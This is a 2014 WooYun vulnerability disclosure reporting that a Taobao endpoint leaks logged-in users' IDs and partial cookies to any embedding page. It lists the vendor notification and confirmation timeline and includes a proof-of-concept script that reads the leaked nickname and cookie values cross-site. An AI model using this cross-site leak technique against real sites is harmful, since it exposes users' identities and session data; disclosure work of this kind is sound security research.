WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-070067

漏洞标题：淘宝官网某处接口泄露用户淘宝ID和部分COOKIE

相关厂商：淘宝网

漏洞作者： 猪猪侠

提交时间：2014-07-28 22:27

修复时间：2014-09-11 22:28

公开时间：2014-09-11 22:28

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2014-07-28： 细节已通知厂商并且等待厂商处理中
2014-07-29： 厂商已经确认，细节仅向厂商公开
2014-08-08： 细节向核心白帽子及相关领域专家公开
2014-08-18： 细节向普通白帽子公开
2014-08-28： 细节向实习白帽子公开
2014-09-11： 细节向公众公开

简要描述：

淘宝官网某处接口泄露用户淘宝ID和部分COOKIE

详细说明：

var userCookie_2 ={_nk_:'wooyuntest',_l_g_:'Ug==',ck1:'',tracknick:'wooyuntest',mt:'ci=7_1',l:'',uc1:'lltime=1406557058&cookie14=UoW3ucSB7STjwA==&existShop=false&cookie16=W5iHLLyFPlMGbLDwA+dvAGZqLg==&cookie21=URm48syIZQ==&tag=7&cookie15=Vq8l+KCLz3/65A==',version:'2'};

漏洞证明：

<script src="http://www.taobao.com/go/app/tmall/login-api2.php.php"></script>
<script>
	document.writeln('登录名：');
	document.writeln(userCookie_2.tracknick);
	document.writeln('<br> Cookies：');
	document.writeln(userCookie_2.uc1);
  </script>

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

漏洞评价：

评论